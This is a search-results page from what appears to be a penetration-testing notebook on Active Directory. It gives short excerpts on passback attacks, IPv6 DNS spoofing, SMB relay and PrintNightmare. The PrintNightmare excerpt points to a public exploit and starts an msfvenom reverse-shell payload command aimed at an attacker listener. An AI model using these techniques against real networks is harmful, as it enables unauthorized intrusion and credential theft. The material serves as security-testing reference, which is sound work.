Search Results
10 total results found
Active Directory
Also, consider taking a look at my Active Directory Attack Map. While it doesn't cover every possible attack avenue, and isn't as sophisticated as some other mindmaps, I think it does a pretty good job of visualizing some of the information found in this book.
Post Exploitation: Enumeration
Post Exploitation: Attacks
Initial Attack Vectors
Internal: Attack vectors that are ideal for internal penetration tests, where the attacker plants a device on the network or uploads tools to a compromised host. External: Attack vectors that could work in both internal and external ...
Joining Linux Hosts to Active Directory Domain
Session 10: Jan. 18, 2024
Passback Attacks (Internal/External)
What's the Flaw? Usually involves an insecure device -- like a printer or multifunction device -- which is configured with an LDAP or SMTP client and credentials. It could be a web server too -- where there is an LDAP or SMTP client. The credentials are usual...
IPv6 DNS Spoofing (Internal)
Note: Network Environment. This spoofing attack works by sending a router announcement to multicast ff02::1. Therefore, it will only affect domain-joined hosts on the same segment as the attacker machine. What is IPv6 DNS Spoofing? An attacker announ...
SMB Relay (Internal/External)
Note: Network Environment. This attack works best in a flat network. However, as long as the attacker machine and target(s) are routable and no firewalls are blocking required ports, it could work across network segments. What is SMB Relay? A man-in-the-m...
PrintNightmare (Internal/External)
Remote Code Execution https://github.com/cube0x0/CVE-2021-1675 Contains full details on scanning and mitigation. Could potentially be used against a domain controller for easy access to a reverse shell. Create payload msfvenom -p <payload> LHOST=<kali-i...